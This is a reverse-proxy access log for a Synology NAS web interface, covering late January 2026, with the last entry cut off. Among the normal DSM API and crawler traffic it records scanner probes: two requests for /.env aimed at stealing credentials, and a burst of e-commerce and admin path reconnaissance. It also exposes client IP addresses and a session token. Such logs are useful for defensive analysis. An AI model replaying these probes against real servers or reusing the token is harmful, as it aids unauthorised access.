POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 174] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 698] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 2092] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:20:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:03 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:13 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:13:21:18 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=f2zDo5IEsPcHw&UserType=user&EIO=3&transport=websocket&sid=py5VkyfUWROqviZNAAAH" [Client 84.1.26.27] [Length 22021] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:13:21:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:17:40:42 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 145.239.84.133] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0" "-" +[22/Jan/2026:23:03:40 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.47.183] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:40 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.47.183] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:23:03:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769123020393" [Client 37.76.47.183] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:23:03:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769123020593" [Client 37.76.47.183] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[23/Jan/2026:19:02:49 +0000] - 403 403 - GET https nas.profibot.hu "/.env" [Client 204.76.203.25] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[23/Jan/2026:22:36:19 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 18.213.106.41] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36" "-" +[23/Jan/2026:22:36:20 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 18.213.106.41] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36" "-" +[24/Jan/2026:07:27:31 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 149.57.180.47] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:10:39:00 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 23.27.145.145] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[24/Jan/2026:18:24:57 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.2.117] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:24:57 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.2.117] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:18:24:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769279097426" [Client 37.76.2.117] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:18:24:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769279097767" [Client 37.76.2.117] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:18:27:27 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.2.117] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[24/Jan/2026:18:27:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.2.117] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:18:27:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769279247908" [Client 37.76.2.117] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:18:27:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769279248070" [Client 37.76.2.117] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[24/Jan/2026:21:12:28 +0000] - - 301 - GET http nas.profibot.hu "/robots.txt" [Client 74.7.241.182] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[24/Jan/2026:21:12:29 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 74.7.241.182] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "http://nas.profibot.hu/robots.txt" +[25/Jan/2026:00:27:52 +0000] - - 301 - GET http nas.profibot.hu "/" [Client 199.45.154.133] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:03 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 199.45.154.140] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:07 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 199.45.154.140] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=40438" [Client 199.45.154.140] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_64.png?v=40438" [Client 199.45.154.140] [Length 1312] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:12 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 199.45.154.140] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[25/Jan/2026:00:50:13 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 199.45.154.140] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[26/Jan/2026:02:38:37 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 204.76.203.25] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[27/Jan/2026:01:27:45 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 74.7.241.182] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:09:48:34 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 54.205.198.168] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" "-" +[27/Jan/2026:20:13:39 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 34.91.36.231] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[28/Jan/2026:06:50:16 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:06:50:16 +0000] - 304 304 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:06:50:17 +0000] - 304 304 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:06:50:17 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:06:50:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:06:50:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:08:15:12 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 74.7.244.60] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:12:47:55 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 16.147.192.47] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[28/Jan/2026:13:21:12 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 109.199.110.55] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/wc/v3" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/magento_version" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?route=checkout/cart" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?route=account/register" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?route=account/login" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?route=checkout/checkout" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/admin/" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:21:13 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/" [Client 109.199.110.55] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:23:33:48 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.10.148] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[28/Jan/2026:23:33:48 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.10.148] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:23:33:49 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962" [Client 37.76.10.148] [Length 585179] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:23:33:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769643229224" [Client 37.76.10.148] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[28/Jan/2026:23:33:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769643230056" [Client 37.76.10.148] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:01:35:15 +0000] - 403 403 - GET https nas.profibot.hu "/.env" [Client 204.76.203.25] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[29/Jan/2026:05:44:22 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.13.82] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:05:44:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 37.76.13.82] [Length 641] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769665462956" [Client 37.76.13.82] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665463094" [Client 37.76.13.82] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665481500" [Client 37.76.13.82] [Length 727] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi&enable_syno_token=yes?_dc=1769665481655" [Client 37.76.13.82] [Length 237] [Gzip -] [Sent-to 